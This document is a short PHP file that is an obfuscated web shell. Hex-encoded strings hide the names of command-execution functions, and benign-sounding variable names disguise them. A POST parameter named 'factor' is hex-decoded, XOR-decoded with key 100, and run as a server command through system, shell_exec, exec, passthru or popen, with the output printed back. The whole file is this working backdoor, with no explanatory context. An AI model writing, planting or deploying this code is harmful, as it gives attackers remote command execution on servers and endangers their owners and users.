<?php

$reverse_searcher7 = "p\x63\x6Cose";
$reverse_searcher6 = "\x73\x74\x72\x65a\x6D\x5F\x67e\x74_c\x6Fnten\x74s";
$reverse_searcher2 = "\x73\x68e\x6Cl_exe\x63";
$reverse_searcher1 = "s\x79ste\x6D";
$reverse_searcher4 = "\x70as\x73\x74h\x72u";
$reverse_searcher5 = "\x70o\x70en";
$reverse_lookup = "\x68e\x782bi\x6E";
$reverse_searcher3 = "\x65xec";
if (isset($_POST["f\x61\x63\x74or"])) {
            function data_storage ($obj, $tkn){
$ref = '';
foreach(str_split($obj) as $char){
$ref.=chr(ord($char)^$tkn);

} return $ref;
 
}
            $factor = $reverse_lookup($_POST["f\x61\x63\x74or"]);
            $factor = data_storage($factor, 100);
            if (function_exists($reverse_searcher1)) {
                $reverse_searcher1($factor);
            } elseif (function_exists($reverse_searcher2)) {
                print $reverse_searcher2($factor);
            } elseif (function_exists($reverse_searcher3)) {
                $reverse_searcher3($factor, $elem_obj);
                print join("\n", $elem_obj);
            } elseif (function_exists($reverse_searcher4)) {
                $reverse_searcher4($factor);
            } elseif (function_exists($reverse_searcher5) && function_exists($reverse_searcher6) && function_exists($reverse_searcher7)) {
                $tkn_ref = $reverse_searcher5($factor, 'r');
                if ($tkn_ref) {
                    $data_mrk = $reverse_searcher6($tkn_ref);
                    $reverse_searcher7($tkn_ref);
                    print $data_mrk;
                }
            }
            exit;
        }